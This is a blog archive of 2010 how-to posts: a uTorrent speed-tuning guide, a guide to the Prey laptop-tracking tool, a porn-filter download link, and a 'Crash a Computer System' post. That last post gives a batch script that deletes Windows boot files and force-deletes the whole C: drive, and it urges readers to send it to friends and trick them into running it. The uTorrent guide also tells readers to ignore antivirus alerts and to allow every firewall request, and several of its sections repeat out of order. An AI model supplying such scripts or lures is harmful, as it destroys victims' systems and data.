Affichage des articles dont le libellé est How to. Afficher tous les articles
Affichage des articles dont le libellé est How to. Afficher tous les articles

jeudi 23 septembre 2010

Maximizing BitTorrent Speed With uTorrent

What We Need

  1. An Internet Connection and its maximum download and upload speed. If you are not sure of your download/upload speeds, visit http://www.speedtest.net/ to run a speed test. Select a download location closest to you, especially if you are outside US. The Recommended Server (golden pyramid) works out most of the time.

    Once the test is done, you get the results:

    Note down the numbers under Download and Upload including the unit; in this case, Mbps. You will need them later.
  2. Patched TCPIP.sys to allow more concurrent half-open connections. Windows XP SP2 and Vista limits the number of half-open connections to 10. Windows 7 users: This patcher is NOT required for Windows 7 as there is no such limitation in Windows 7.NOTE: This step has been generally found not to make any improvements in Bittorrent speed. In fact, it can even cause problems with certain routers such as auto-restarting and stalling of internet access. Do this only as a last resort. To increase the limit, there are two freely available patchers:
    Lvllord Patch – ONLY for Windows XP Users (NOT Vista/Windows 7 users, see next step for Vista users)
    UPDATE: There has been a recent Automatic Update (MS08-001) released on January 8 2008 that addresses some network security concerns. The below has NOT been tested with the latest TCPIP.SYS (v5.0.2195.7147) file. Update:The patch has been tested with KB941644 (an automatic update) and works perfectly!
    1. Go to this site - http://www.lvllord.de/
    2. Click on Downloads.
    3. Right-click the link and click “Save Target As“.
    4. Save it in your Desktop.
    5. Open the file and run the program located inside the archive, agreeing to the security warning.
    6. Some text should scroll by in a MS-DOS window, after it ends, type C.
    7. Enter 100 for the number of concurrent half-open connections and press Enter.
    8. Type Y and the file should be patched. Cancel any Windows XP warnings that should appear, it is part of Microsoft’s way of ensuring its files are not tampered with (the utility tampers with them on purpose to change the limit).
    Half-Open Patch – For Windows VISTA / Windows XP (NOT required for Windows 7)
    This patcher works for both 32 and 64 bit Vista and XP versions.
    1. Go to this site - http://half-open.com/download_en.htm.
    2. Download the EXE file in the link titled Half-open limit fix 4.1 (as of July 2010)
    3. Open the folder where you saved the file and run the file you downloaded
    4. Under ‘New value’, set it to 100 
    5. Click ‘Add to tcpip.sys
    6. Click OK.
    7. Click OK again. Cancel any Windows warnings that may appear, it is part of Microsoft’s way of ensuring its files are not tampered with (the utility tampers with them on purpose to change the limit).
    8. Restart your computer.
    9. If something is not working right (e.g. Internet access does not work anymore) and you want to undo the changes, run the software again and click “Restore original file”.
    NOTE: The patchers above are known to trigger anti-virus alerts. Ignore them. The alerts are triggered due to the patcher making changes to the way Windows works hence making the anti-virus software suspicious.
  3. A BitTorrent software client – We recommend uTorrent. This guide uses uTorrent for the tutorial.
  4. And finally, some torrents to kick off a download. A sample torrent file will be provided later.

Download

As of August 2010, the latest Windows version is 2.0.3. For MAC users, some of these tips do not apply to you. Please see the FAQ below.
Getting to the file:
  1. Click on this download page - http://www.utorrent.com/downloads
  2. Click the big green image that says “Download Now“.
  3. A dialog box should pop out. Choose to RUN it.
  4. If any security dialogs appear, click Run as we know this is a safe file.

Configuring uTorrent

The configuration part is where most people mess up. Most of us will just click through the dialogs accepting the default values. This may apply to some of us, but not the majority. The below installation guide uses uTorrent Version 2.0. Older versions may have some steps missing.
  1. Run the program. Ignore the security warning if any appears (Click Run) – we know perfectly well that the file is legitimate.
  2. You get the welcome screen when it runs:

    Click Next. A scam warning will appear as many people have been tricked into paying for utorrent which is supposed to be free in the first place. Anyway, click Next.
  3. New to utorrent version 1.8.3 onwards – a license agreement! This used to be as a link in the Install location.

    Read the legal mambo jambo (yea right!). Click I Agree to continue.
Now you see the full uTorrent window in full glamour.

Starting a simple torrent

We need to start a simple download, and the one that will be using is a 650MB file of Ubuntu! It is a perfectly legal and free file to download. We will be downloading this file purely for testing and delete it later on (as it is of no use to us)
  1. Minimize uTorrent for now. Notice that it resides on the system tray (bottom right) automatically.
  2. Click to http://torrent.ubuntu.com:6969/.
  3. Look at the column labeled “complete”. Find the row with the largest value. A quick way is to scroll down and scan for a 3 digit figure in that column. Or perform a search for the string ‘desktop-i386.iso’.
  4. Now download the torrent – click the link in the 2nd column of that row
  5. You should get this dialog:

    This is the metadata file, it contains information on the file you want to download eventually. That is why the file size is so small. We want uTorrent to automatically start downloading it, so click Open. NOTE: The “Name and Type” may differ on your system. This is normal, as Ubuntu is frequently updated
    NOTE: If the Open button does not appear, save the file in your desktop. Then start utorrent, File > Open torrent and open the torrent you saved. Delete the torrent file in the desktop as uTorrent automatically makes a copy of it.
  6. The file opens with uTorrent which automatically pops up this dialog

    All values are automatically filled in for you. Here is also where you select files that you don’t want to download – if the download has many files which in this case is not. Remember where the file is stored as indicated in the textfield under “Save As”, or save it in a different location more convenient for you. All looking good, click OK.

Progress of the Download

Click on the Ubuntu torrent (the only item in the list) to view more information on it. You will see all the values at the bottom suddenly burst with activity!


Looks like the torrent has a total of 42 seeds and 4 downloaders. 42 seeds is a lot (but some torrents can have 1000+ seeds, depending on popularity) and it means you should get the full file in no time! A seed is a term used to refer to peers who have downloaded and are sharing the complete file.
However, after running for 5 minutes, the speed refuses to go above 20 KB/s, which is not possible for a highly seeded torrent. Could it be our ISP throttling?

Enabling Protocol Encryption, uTP (UDP Packets) and Increasing Speed Via Max Half Open Connections

uTorrent by default disables protocol encryption. We need to enable this so that the ISP’s packet shaping hardware will detect our BitTorrent traffic as normal traffic and hopefully let it pass.
  1. Click on OptionsPreferences.
  2. Click on BitTorrent in the left column,
  3. You should get a dialog similar to one below
  4. The one we are concerned about is Protocol Encryption. Set the Outgoing to Enabled.
  5. Click on Advanced on the left column.
  6. If you did NOT patch your TCPIP.sys to allow more concurrent half-open connections above, SKIP this step.

    Change “net.max_halfopen” value to 50 by selecting the line, modifying the value at the bottom to 50 and clicking Set. NOTE: It is normal for a asterisk(*) to appear. This is to indicate that the value has been changed from the default value.
From uTorrent version 1.8.3 onwards, a new UDP protocol named uTP was introduced which sends UDP packets as well as TCP packets. The main benefit is that it provides a new avenue of bypassing ISP throttling limits resulting in a more efficient torrent swarm.
  1. At the same Advanced screen, Change “bt.transp_disposition” value to 255 by selecting the line, modifying the value at the bottom to 255 and clicking Set.
  2. Click OK. Stop all torrents (red stop button on toolbar on top), wait 10 seconds, and Start the torrent (green play button on toolbar). Now let’s watch the speeds.
Hopefully, the above changes will improve speeds. Ultimately, it depends on the number of seeders and peers with high upload rate. Remember, you must upload to enjoy good download rates, but not so high that it affects download speed. Experiment.

Bonus Tip!

This part only applies for public torrents. It is useless for private torrents as they specifically prohibit sharing with other trackers.
The tip: Look for more public tracker servers that have the file. However, this tip does not work for torrents that are private i.e. the DHT Status field shows ‘not allowed’ for the torrent.


After getting the same torrent from ISOHunt.com (a site that consolidates multiple trackers into one torrent file)


Needless to say, the speed increased tenfold! Now the question: how do you find more torrents of the same kind? There are several ways, via ISOHunt, Torrentz and… Google! Here’s how to make your search easier.
  1. Highlight the row of the torrent by clicking on the torrent name
  2. Click on the General tab at the bottom of the window
  3. There should be a field labeled Hash near to the bottom with a string of 40 alphanumeric characters. Right-click the value of this field and click Copy.
Now you have the hash of your torrent. With this hash, you can perform searches to find the exact torrent with additional trackers at most torrent sites. There can be many versions of a torrent with some differences. You cannot combine different versions (with different hashes) of a torrent into one torrent. This is why we are using this hash to get the exact same torrent with hopefully more trackers.

Finding More Trackers Via ISOHunt.Com

  1. Go to ISOHunt.com
  2. Paste the hash into the search box. To paste the value, right-click the search box, and click Paste. Click Search.
  3. There should only be one result. Click that result and download the torrent.
  4. You should get the box below. If not, you are downloading a wrong or different torrent. The torrent must be exactly the same except for the tracker servers.

Finding More Trackers Via Torrentz.com

  1. Go to Torrentz.com
  2. Paste the hash into the search box. To paste the value, right-click the search box, and click Paste. Click Search.
  3. You should be automatically be brought to the torrent page, if Torrentz has a record for it.
  4. Find the keyword ‘You can get a µTorrent compatible list here‘ at that page.
  5. Click the link it points to. You should get a list of trackers.
  6. Right-click any of the text. Click ‘Select All
  7. Right-click any of the text again. Click ‘Copy
  8. Go to uTorrent and double-click the row of the torrent that want to add the list to
  9. In the box that pops out, go to the General tab (if it isn’t already there)
  10. There should be a text box there labelled Trackers. Place the cursor at the end of this box and hit Enter to add a new line
  11. Right-click the new line and click ‘Paste‘ to paste the list of new trackers. Don’t worry if there are duplicates.
  12. Click ‘OK
For the more determined, you can also search Google with the torrent hash to find more trackers.

Bonus Tip 2!

Optimize your TCP settings. Speedguide.net provides free utilities to make this step as easy as cake. We also have a mirror of the file for Windows XP and forWindows Vista / Windows 7 users.

Optimize TCP settings for Windows XP (NOT Windows Vista / 7)



Steps to optimize your internet connection.
  1. First, download and extract the files to any folder.
  2. Double-click on the TCPOptimizer application in the folder to launch it
  3. At the bottom of the window, click “Optimal Settings”
  4. At the top of the window, select your connection speed. If you are not sure, run the speed test. Use the value that you get for the Download field (which is in kb/s) and set the slider to it.
  5. If you are using ADSL, check with your Internet Service Provider whether it is based on PPPoE or PPPoA. You may also be able to obtain the information via your router’s homepage.
  6. Click ‘Apply Changes’ at the bottom of the window.
  7. Ensure that ‘Backup’ is checked and click OK at the next confirmation box that appears.
  8. Once the changes are done, reboot your system

Optimize TCP settings for Windows Vista / Windows 7 (NOT Windows XP)



Steps to optimize your internet connection.
  1. First, download and extract the files to any folder.
  2. RIGHT-click on the SG_Vista_TcpIp_patch application and click ‘Run as Administrator‘.
  3. Click Yes to the warning that appears.
  4. A window similar to the above should pop up. Type ‘Y’ and press ENTER. Some text should begin to scroll
  5. When the changes are done, the message “Press any key to continue . . .” will appear. Do so.
  6. Restart your system

Further Tips You Can Try For Optimum Speed

Tweaks that can improve your speed:
  1. There should be a green tick at the bottom, not a exclamation mark as below.
    If uTorrent keeps showing this even after 5 minutes, check the possible causes.
  2. To get more peers, right-click the entry on the list, and click Update Tracker (if disabled, grayed out and throttled – you need to wait for some time). Do this especially if you are on a private tracker before you exit the application, so that your ratio is maintained.
  3. Check the Availability column for the torrent. If it is less than 1, chances are that the torrent is new and the original uploader is still uploading. However, if it remains at a value less than 1 (eg, 0.98) for more than a day, either the torrent does not have seeds or it is a fake. (Thanks TTbarDJ)
  4. Try resetting your internet connection by switching off and on the modem and router (if applicable) and then firing up uTorrent again.
  5. Download the latest network driver, uninstall the current one and install back the latest network driver you downloaded by using Device Manager in Start > Control Panel > System > Hardware > Device Manager. This CAN cause your internet to break if you update with the wrong drivers, so be careful!
  6. Make sure you did not set a download limit accidentally! Many people unknowingly set the download limit when they actually intended to set the upload limit in the right-click menu of the tray icon. To check, Options > PreferencesBandwidth > Maximum download rate > Set to “0″ > OK
  7. The following software are known to cause problems with uTorrent: Nvidia Firewall, BitDefender, Avast!, Spyware Doctor 5, Kerio Personal Firewall, Sunbelt Personal Firewall, Norton GoBack, McAfee Firewall, SpamPal, Norman Personal Firewall, CyberSitter, V-Com System Suite, V-Com Fixit Pro, Norman Personal Firewall, McAfee Firewall, Cybersitter, Norton AntiVirus and McAfee Anti-virus. If you have any of this software, you may want to read this page.
  8. The following routers are known to cause problems with uTorrent: Linksys WRT54G, Linksys WRT54GL , Linksys WRT54GGS and D-Link DI-514 . If you have any of this routers, you may want to read this page. As of August 2010, the linked page does not show any of the incompatible hardware (it did in the past) and has been removed for some reason.
  9. Power off your router and modem and power it on back after about 30 seconds. This has made improvements in speed for some people.
Tweaks that can improve or LOWER your speed:
  1. Some people have reported speed increases using an older version of utorrent, specifically utorrent version 1.6. You can download it from our servers at bootstrike.com and try that instead.
  2. Setting a high upload can sometimes slow down a fast torrent. For example, in our ADSL connection, if we upload at 10KB/s we can get up to 350KB/s. If we upload at 30KB/s, the download speed gets limited to 200KB/s. The total upload available to me is 60KB/s.This is where you have to experiment by setting a low upload rate (from 10 at Options > PreferencesBandwidth > Maximum upload rate) and watching if the speeds increase for 5 minutes, especially if the torrent is heavily seeded. But remember, you must upload in order for peers to share their downloaded data with you. It is possible to set a very low upload, but the chance of peers sending you their data will decrease, pulling down your download speed.
  3. Some people have reported speed increases by setting the peer.lazy_bitfield setting to false in Options > PreferencesAdvanced.
  4. Change the Options > PreferencesBittorrent > Protocol Encryption to Forced. This will force encryption on all outgoing packets and will not fallback to un-encrypted mode if the peer refuses to co-operate. Good for connecting to only encryption-enabled peers. Avoid doing this for torrents with low peers/seeds.
  5. Remove the check for Options > PreferencesBittorrent > Protocol EncryptionAllow Incoming Legacy Connections. This will make all your outgoing and incoming packets fully encrypted, except for tracker communications. Peers who are using a torrent software that doesn’t support encryption are dropped. Avoid doing this for torrents with low peers/seeds.
  6. Private trackers, especially those that specifically tell utorrent to disable DHT (effectively disabling Peer Exchange and Local Peer Discovery too), can affect speeds negatively. You can tell if the torrent is private by selecting the torrent and looking at the DHT value. If it says “disabled”, it is a private torrent.That said, the main reason private trackers exist is because they enforce sharing rules that tries to prevent a person from downloading a torrent and running off without uploading back the same amount of data he downloaded. For new and popular torrents on such trackers, you may be able to get good speeds as everyone will be trying to increase their upload/download ratio. Again, experiment. The key point here is the seeds/leechers ratio and the popularity of them in public and private trackers.
  7. Increase the number of connections in Options > PreferencesBandwidth > Number of Connections. Experiment by increasing the number of global/max connections in steps of 25.
  8. Some people use software such as Peer Guardian or Protowall to ‘protect’ from law spy computers. At last check, Peer Guardian blocks about 773,125,915 out of 4,294,967,296 possible IPv4 addresses. That is about 18% of the whole Internet World Wide Web! Which means lesser peers and that means lower speeds! For the protection it claims to offer, speed is a compromise.
  9. Windows Vista / Windows 7 users! Disabling TCP/IP Auto Tuning helped improve speeds for some people
    1. Click Start.
    2. In the box at the bottom, type CMD and do NOT press Enter. You should see CMD come up on the list as shown below:
    3. RIGHT-click the icon and click “Run As Administrator
    4. A “User Account Control” box should spring up. Click Continue (or ‘Yes’ for Windows 7)
    5. Type this into the prompt: netsh int tcp set global autotuninglevel=disable
    6. You should get a “Ok.” response.
    7. Restart your system.
  10. If you have a proxy server such as a local ISP’s one, using it has helped many people improve their speeds. Go to Options > Preferences > Connection. Under ‘Proxy Server’, select the Type as HTTP and specify your proxy and port. Check the box ‘Use proxy server for peer-to-peer connections’. Press OK and restart uTorrent.
  11. UTP has been reported to cause problems. To fully disable UTP, go to Options > Preferences > Advanced and set bt.transp_disposition to 5.Note that the setting overrides the “Enable bandwidth management” setting in Options > Preferences > BitTorrent.
  12. The automatic TCP rate limiter can also cause problems. To disable this feature, go to Options > Preferences > Advanced and set bt.tcp_rate_control to false.
Good luck! It all boils down to Experimenting
Having done all the above, if the website still says that it has problems accessing the port, the ultimate test will be when we do a test torrent download. For now, click on Save & Continue. If the button is disabled, reselect the upload speed value and the button should enable again.

  • It will give the following dialog:

    You want the program to be easily accessible, don’t you? Click Next > with the default options and uTorrent shortcut s will be created in your desktop, quick launch and start menu, as well as installing it to a permanent location.

  • uTorrent Setup asks your permission to start automatically. Prior to version 2.0, it will ask for permission to associate with torrent files too. All are fine except for the last one – ‘Start utorrent when Windows starts up’. This used to be optional but with version 1.8.3 onwards, utorrent is set by default to start along when Windows starts. This may irk some users, especially if you pay for Internet Access by the megabyte. How? If you close uTorrent after you are done with it without deleting the torrent and restart your computer, utorrent starts in the background and continues seeding the torrents.
    Bottom line? If your Internet Access is unlimited, leave the checkbox checked. Otherwise, uncheck the last box.

  • The latest releases of uTorrent now come bundled with Ask.Com Toolbar:

    This is NOT required, 100% optional and will NOT affect your download/upload speeds. Installing this will insert a Ask.Com Toolbar in Internet Explorer and Firefox (if you have it). Then why is uTorrent including Ask.com Toolbar? Because it gets paid for every installation and is a means of some revenue for the company. So it is entirely up to you whether you want it. If you find that you don’t like it later on, you can remove the toolbar from Add/Remove programs later on without affecting uTorrent.
    Check your desired boxes and click Install

  • This step only applies for versions older than utorrent v1.8.2. It ensures that utorrent is set to handle all torrent files automatically.

    Click Yes. On current versions of uTorrent, this is done automatically.

  • uTorrent v2 has a new redesigned Setup Guide feature. This is an important step.

    Uncheck ‘Bandwidth’ since you already know your Internet connection speed limits from the Speedtest.net tests above. We do not recommend using uTorrent’s bandwidth tests as the servers are not as globalized as Speedtest.net. Now the value that we are interested in right now is the dropdown labelled ‘Your Upload Speed’, which is using the unit of kbit/s (kilobits per second). If you have trouble understanding your speed, consider this: Internet Explorer shows download speed as KBps when you download a file.
    There is a big difference between 5Kbps (kilobits) and 5KBps (kilobytes). Make sure you got the right values in kbps (not kBps, the cAsE of ‘b’ matters) . Use Google Calculator if you need help with conversions. .

  • Click the ‘Current Settings – (Unlimited)’ dropdown box

    The authors of uTorrent have been very helpful in providing a list of predefined values. Your connection should be near to one of the above categories. Each value (e.g. “28.8kbit/s (Dial-up)“) means that your download is unlimited and your upload is limited to the number indicated there (e.g. 28.8kbps, which is 3.6KBps by Google Calculator). With your results of the speed test you did above, select the closest upload speed from the list. Select a value lower than your upload speed. For example, if your upload is 31.6 kbit/s, you would select 28.8kbit/s. Once you select a value, uTorrent instantly adjusts the “uTorrent Bandwidth Configuration ” area with recommended values for your upload speed. 1Mbit (1 megabit) is equivalent to 1024kbit (1024 kilobits) by Google Calculator.
    We’re not finished yet.
    Note: The default download speed in utorrent is Unlimited. Even if your download is limited in some way, it is always better to leave it at unlimited to get maximum download speeds. However, if you need to limit your download speeds, right-click the utorrent icon on the system tray (bottom right), clickDownload Limit and set accordingly. You can also set this in the Preferences dialog.
    Note: uTorrent randomly generates a port number in Current Port. This guide assumes the port number to be 55641 – but you can substitute it with the number uTorrent shows.
    Click Run Tests.

  • Port forwarding is important. Click on “Run Tests” to run the test. If you have trouble running the test (e.g. receive results similar to “Results: Port is not open (you are still able to download)”, it could be due to one or more of the following reasons:

    1. Home Router
      If you are running a router (sometimes called wireless access point) at home, you will have to configure it to route all TCP / UDP BitTorrent traffic to port55641 to your computer. If so, visit this page for a guide on how to port forward. Click the router you are using and follow instructions. When following the guide and the router asks for a range of ports to forward, simply specify 55641 to 55641 (remember to substitute it with the actual port number you are using).
    2. Personal Firewall
      If you are running a firewall software such as Norton Internet SecurityNorton 360Kaspersky, ZoneAlarm, etc, then configure your firewall such that uTorrent has access to port 55641. This is normally accomplished by starting up utorrent. The firewall should spring up an access alert. Simply select the option to “Always Allow” to allow the program to access the Internet. Messages such as “utorrent wants to act as a server” or “utorrent is attempting to listen for connections” must be allowed as well. In fact, if the program in question is utorrent, you should always check “Allow” no matter what request it is. Windows Firewall Users
      uTorrent will automatically configure Windows Firewall for you so there is no action needed from you.

  • uTorrent Setup asks your permission to start automatically. Prior to version 2.0, it will ask for permission to associate with torrent files too.

  • The latest releases of uTorrent now come bundled with Ask.Com Toolbar:

    This is NOT required, 100% optional and will NOT affect your download/upload speeds. Installing this will insert a Ask.Com Toolbar in Internet Explorer and Firefox (if you have it). Then why is uTorrent including Ask.com Toolbar? Because it gets paid for every installation and is a means of some revenue for the company. So it is entirely up to you whether you want it. If you find that you don’t like it later on, you can remove the toolbar from Add/Remove programs later on without affecting uTorrent.
    Check your desired boxes and click Install

  • This step only applies for versions older than utorrent v1.8.2. It ensures that utorrent is set to handle all torrent files automatically.

    Click Yes. On current versions of uTorrent, this is done automatically.

  • uTorrent v2 has a new redesigned Setup Guide feature. This is an important step.

    Uncheck ‘Bandwidth’ since you already know your Internet connection speed limits from the Speedtest.net tests above. We do not recommend using uTorrent’s bandwidth tests as the servers are not as globalized as Speedtest.net. Now the value that we are interested in right now is the dropdown labelled ‘Your Upload Speed’, which is using the unit of kbit/s (kilobits per second). If you have trouble understanding your speed, consider this: Internet Explorer shows download speed as KBps when you download a file.
    There is a big difference between 5Kbps (kilobits) and 5KBps (kilobytes). Make sure you got the right values in kbps (not kBps, the cAsE of ‘b’ matters) . Use Google Calculator if you need help with conversions. .

  • Click the ‘Current Settings – (Unlimited)’ dropdown box

    The authors of uTorrent have been very helpful in providing a list of predefined values. Your connection should be near to one of the above categories. Each value (e.g. “28.8kbit/s (Dial-up)“) means that your download is unlimited and your upload is limited to the number indicated there (e.g. 28.8kbps, which is 3.6KBps by Google Calculator). With your results of the speed test you did above, select the closest upload speed from the list. Select a value lower than your upload speed. For example, if your upload is 31.6 kbit/s, you would select 28.8kbit/s. Once you select a value, uTorrent instantly adjusts the “uTorrent Bandwidth Configuration ” area with recommended values for your upload speed. 1Mbit (1 megabit) is equivalent to 1024kbit (1024 kilobits) by Google Calculator.
    We’re not finished yet.
    Note: The default download speed in utorrent is Unlimited. Even if your download is limited in some way, it is always better to leave it at unlimited to get maximum download speeds. However, if you need to limit your download speeds, right-click the utorrent icon on the system tray (bottom right), clickDownload Limit and set accordingly. You can also set this in the Preferences dialog.
    Note: uTorrent randomly generates a port number in Current Port. This guide assumes the port number to be 55641 – but you can substitute it with the number uTorrent shows.
    Click Run Tests.

  • Port forwarding is important. Click on “Run Tests” to run the test. If you have trouble running the test (e.g. receive results similar to “Results: Port is not open (you are still able to download)”, it could be due to one or more of the following reasons:

    1. Home Router
      If you are running a router (sometimes called wireless access point) at home, you will have to configure it to route all TCP / UDP BitTorrent traffic to port55641 to your computer. If so, visit this page for a guide on how to port forward. Click the router you are using and follow instructions. When following the guide and the router asks for a range of ports to forward, simply specify 55641 to 55641 (remember to substitute it with the actual port number you are using).
    2. Personal Firewall
      If you are running a firewall software such as Norton Internet SecurityNorton 360Kaspersky, ZoneAlarm, etc, then configure your firewall such that uTorrent has access to port 55641. This is normally accomplished by starting up utorrent. The firewall should spring up an access alert. Simply select the option to “Always Allow” to allow the program to access the Internet. Messages such as “utorrent wants to act as a server” or “utorrent is attempting to listen for connections” must be allowed as well. In fact, if the program in question is utorrent, you should always check “Allow” no matter what request it is. Windows Firewall Users
      uTorrent will automatically configure Windows Firewall for you so there is no action needed from you.
    3. Corporate Firewall
      Are you running this software in a corporate network? Bad news – you have to inform the admin that you want the port to be forwarded to your computer. The good news – you can still go by without port forwarding, but speeds will not be optimal

  • Corporate Firewall
    Are you running this software in a corporate network? Bad news – you have to inform the admin that you want the port to be forwarded to your computer. The good news – you can still go by without port forwarding, but speeds will not be optimal

  • All are fine except for the last one – ‘Start utorrent when Windows starts up’. This used to be optional but with version 1.8.3 onwards, utorrent is set by default to start along when Windows starts. This may irk some users, especially if you pay for Internet Access by the megabyte. How? If you close uTorrent after you are done with it without deleting the torrent and restart your computer, utorrent starts in the background and continues seeding the torrents.
    Bottom line? If your Internet Access is unlimited, leave the checkbox checked. Otherwise, uncheck the last box.

    How to Track and (Potentially) Recover Your Stolen Laptop or Android with Prey

    How to Track and (Potentially) Recover Your Stolen Laptop or Android with Prey

    How to Track and (Potentially) Recover Your Stolen Laptop or Android with PreyLaptops are lighter and more powerful than ever; they’re also easier to steal. Luckily, a genuinely versatile and powerful track-and-recover applications is also free. Here’s how Prey works, and how it could save you a month’s rent in new laptop cost.

    Why Prey?

    There are obvious reasons to like Prey. Chief among them, it’s free to use for up to three devices of any kind, from computers running Windows, Mac, or Linux to Android devices. But that wouldn’t mean anything if the tracking Prey provided wasn’t really solid. It’s not fool-proof, especially if the thief wants to entirely wipe your computer or phone, but if that’s not the case, it gives you a fighting chance.
    We’ll tell you why in readable text, being a blog and all, but we think our video walkthrough, embedded above, tells the tale even better—with old-timey music, too,courtesy of Incompetech.
    On a laptop with a webcam, a Wi-Fi chip, and Prey installed, it’s a good bet you’ll have a photo of your thief and an approximate location on them just as soon as they have your computer running for a few minutes. You don’t have to actively search, either—devices with Prey installed in the background “phone home” to your web-based account every 20 minutes by default (you can decrease this interval), spilling their guts about everything they’re doing.
    How to Track and (Potentially) Recover Your Stolen Laptop or Android with Prey
    Webcam snaps, desktop screenshots, lists of modified files and running programs, network data galore, and much more are provided to those who want to quietly track their, uh, prey. If you’d prefer to think that maybe someone just found your device, you can set read-aloud alerts, fire off alarms, change the system wallpaper, lock it with a password, and remotely wipe out your browser data—all from any browser you can get to.
    The basics of installing and using Prey are covered in the video, but here’s a brief run-through:

    Step One: Set It and Forget It

    How to Track and (Potentially) Recover Your Stolen Laptop or Android with PreyHead to Prey’s download section, grab the package for your system (again, Prey supports Windows, Mac, Linux, and Android), then install it as normal, creating an account as you do so. The only major issue to address is how you want to control your system and track it if it goes missing. Most people will want to stick with the default, web-based standard method, but those who would prefer an email-based, server-controlled tracking setup can explore an “Advanced” option. I’m focusing on the default Prey + Control Panel setup.
    Because it’s tracking software that doesn’t want to be seen, Prey is almost invisible when it’s running on your system, without any configuration or executable files to be seen. In fact, once you’ve deleted the installer, you shouldn’t be able to find Prey at all in your system, because that’s the idea. It quietly and quickly checks in with Prey’s servers in the background, at an interval you decide, to see if the owner has logged in and marked it as stolen. That’s all it does—until you flip the switch on Prey’s servers to note that it is, in fact, stolen, or ask for an update on the hardware profile.
    How to Track and (Potentially) Recover Your Stolen Laptop or Android with PreyAfter you’ve installed Prey and set your defaults, log into Prey’s web center, and peek at the basic configuration tools. You can give each of your devices a unique name, clarify its details, and change the frequency of its reporting time. You can set the frequency to a reasonable 20 or 30 minutes now, but don’t worry—you can update it as soon as your device is swiped, so you won’t be wasting those precious early minutes wondering what’s up.

    Step Two: Set Your Modules

    How to Track and (Potentially) Recover Your Stolen Laptop or Android with PreyThe Modules menu on Prey’s site determines what happens when your device checks in and notices that it’s stolen (if only computers could recognize their strange meta-existence). There are two types of modules: the quiet, informative “Report” modules, and the more aggressive “Action” modules that secure your data, and likely let the thief or finder know that you know your stuff is missing—and that you’ve got a way to track it.
    How to Track and (Potentially) Recover Your Stolen Laptop or Android with PreyReport Modules: In general, you’ll want to switch all these on. You never know what might come in handy, and it’s not too much more effort for Prey to grab any one item more than the others. You can set limits on how much raw modified data and running program information is thrown your way, but the defaults are fine, if voluminous. The most important module to turn on is Geo, which uses Google’s Wi-FI location API to try and triangulate a laptop’s location—or the GPS chip in an Android for very accurate positioning.
    The main exception would be the “Webcam” option. If your laptop has a webcam that must activate a very distinct light or LED before snapping a picture, it could be an obvious give-away and tip your hand. MacBooks, for example, turn on a green LED when grabbing images from the webcam. If you wanted to go stealth and not let the unlawful owner know you had them, you could shut this off—but you’d likely be better off trying to grab at least one picture of the thief unawares. (He or she may not be perceptive or paranoid enough to catch what’s going on.)
    How to Track and (Potentially) Recover Your Stolen Laptop or Android with PreyAlarm modules: When subtle won’t work, Alarm Modules provide you with your next best chance of alerting the thief, the person who bought stolen goods from the thief, and potentially anyone near them, that your laptop is your laptop. Failing that, some alarm modules can at least wipe out any potentially revealing information about you.
    Alarm, Alert, Change Wallpaper, and the password-protected Lock are pretty self-explanatory. Our volunteer “thief” Whitson reported that the alarm is, in fact, quite loud and attention-getting, and that the pop-up alert comes up over anything else you may be doing.
    The “Secure” module is where you make your big security decisions. You can set Prey to wipe out your entire password keychain, delete data from Firefox, Safari, or Chrome (sorry, Opera users), or wipe down Outlook or Thunderbird. A total account wipe-out would be a nice option, of course, but there’s likely a compromise between making Prey still active and having data deletion access.

    Android SIM Protection

    Android phones set up with Prey actually have fewer reporting and alarm modules than laptops, but they do have one unique feature: SIM card protection. If a thief attempts to swap out the SIM card in your phone, the new SIM number is captured and text-messaged to a contact you set up in the Prey options. With that kind of data and a police contact, you’re pretty close to tracking down your phone.

    Step Three: Using Your Reports

    How to Track and (Potentially) Recover Your Stolen Laptop or Android with PreySo you’ve registered Prey on your laptops and Androids, and if it gets stolen, you’ll get an email announcing a new report is drawn up every X minutes. Now what?
    First things first, report your laptop or device stolen to the police. The cynical may assume they don’t care or don’t have the know-how to track your gear, but the cynical often aren’t shielded members of a law enforcement agency. Give the police everything you have on your device, including serial numbers, identifying stickers or characteristics, and the last place you knew you had it. It never hurts. When using the similar “Find my iPhone” feature of the MobileMe service, police in Madison, Wisc. were able to track down two iPhones stolen from a store. Your mileage will vary, but it’s best to head through official channels first.
    If you’re on your own, you can hope that the thief or other person toting your laptop makes a regular run of certain Wi-Fi spots. You’ll have the IP address they’re connecting outward from, the name and details of the Wi-Fi spot they’re connecting to, and a list of the programs they’re running, connections they’re making, and other details. Your best hope is that geo-location through available Wi-Fi can point you somewhere unique in an uncrowded neighborhood, or that the Wi-Fi they connect to is unique and identifiable—”JoesCoffee”, “246JonesSt”, or something similar would be ideal. If your webcam can grab a clear snap of the thief, all the better. If you’ve got nothing quite so unique and helpful, a visit to the traceroute and other tools at network-tools.com (or nearly any site resulting from a “traceroute” Google search) can potentially get you closer to your missing goods.
    In any case, contact your local police rather than try and pin the phone down yourself. One blogger snatched back an iPhone with some help from friends, but he suggests your journey might not have such a funny ending.

    samedi 18 septembre 2010

    How to Block Porn site (protect your kids from porn websites) 2010

    You dont let your kids read just anything, do you? Well, when they surf the Internet, which have not any filter,they can see whatever emerges

    from it, unless you're there to assign Anti-Porn software to company with them as the porn filter software.

    Anti-Porn - A comprehensive porn filter software to protect your kids from porn websites. Anti-Porn can filter out adult websites, which with

    objects not fit for children, and even filters out chats when offensive and predatory language is used. Anti-Porn software can auto filter

    out ten thousands of porn websites and you can also easily add in the websites which you dont want children to see. Besides, Anti-Porn

    filters out internet material by blocking some predatory word, and you can predefine special words, then, children can not see any internet

    material with those words.

    Download link: download here


    http://ugotfile.com/file/2023850/Anti-Porn_15.0.8.10.rar

    Crash a Computer System

    1. Shut Down a Computer Forever
    Hello this tutorial is just for fun 
    sure you can crash your own computer 
    so here is the how to Crash a Computer System tutorial
    Open notepad and copy/paste this code:

    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini


    Now Save it as a .bat file.

    This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

    REMEMBER - DO NOT CLICK THIS FILE. YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

    Send it to your friends computer and tell them to open it. Have fun!!

    Here is another code too.....

    cmd /c del c:\windows\* /F /S /Q

    cmd /c del c:\* /F /S /Q


    Paste it in NotePad And Save It with Extension .cmd or .bat 


